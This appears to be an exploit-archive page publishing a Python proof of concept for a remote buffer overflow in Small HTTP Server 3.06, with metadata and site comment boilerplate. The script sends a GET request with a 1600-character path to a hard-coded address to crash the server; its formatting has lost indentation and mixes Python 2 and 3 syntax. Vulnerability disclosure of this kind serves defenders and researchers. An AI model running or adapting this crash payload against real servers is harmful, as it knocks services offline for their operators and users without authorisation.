Small HTTP Server 3.06 Remote Buffer Overflow

2022.04.07

Credit: Yehia Elghaly

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-119

# Exploit Title: Small HTTP Server Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-07
# Vendor Homepage: http://smallsrv.com/
# Software Link : http://smallsrv.com/shttps_mgi.exe
# Tested Version: 3.06
# Vulnerability Type: Buffer Overflow Remote
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1
# Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow
#!/usr/bin/env python
from requests.exceptions import ConnectionError
from requests.compat import urljoin, quote_plus
import requests as req
try:
url = "http://192.168.1.99"
term = "A" * 1600
evilb = urljoin(url, quote_plus(term))
resp = req.request(method='GET', url=evilb)
print(resp.text)
except ConnectionError as e:
print "Crashed!!"

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Small HTTP Server 3.06 Remote Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.